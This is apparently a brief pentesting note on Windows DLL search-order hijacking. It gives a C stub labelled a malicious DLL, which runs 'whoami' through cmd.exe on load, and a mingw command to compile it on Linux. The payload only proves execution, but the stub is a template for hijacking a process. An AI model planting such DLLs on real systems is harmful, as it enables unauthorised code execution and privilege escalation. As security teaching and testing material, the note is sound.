Exploiting the Windows DLL search order is basically the same idea as exploiting the LD_LIBRARY_PATH on Linux.
A stub malicious DLL:
#include <windows.h>
BOOL WINAPI DllMain
(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /C whoami > C:\Temp\dll.txt");
ExitProcess(0);
}
return TRUE;
}Compile with mingw (on Linux!):
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll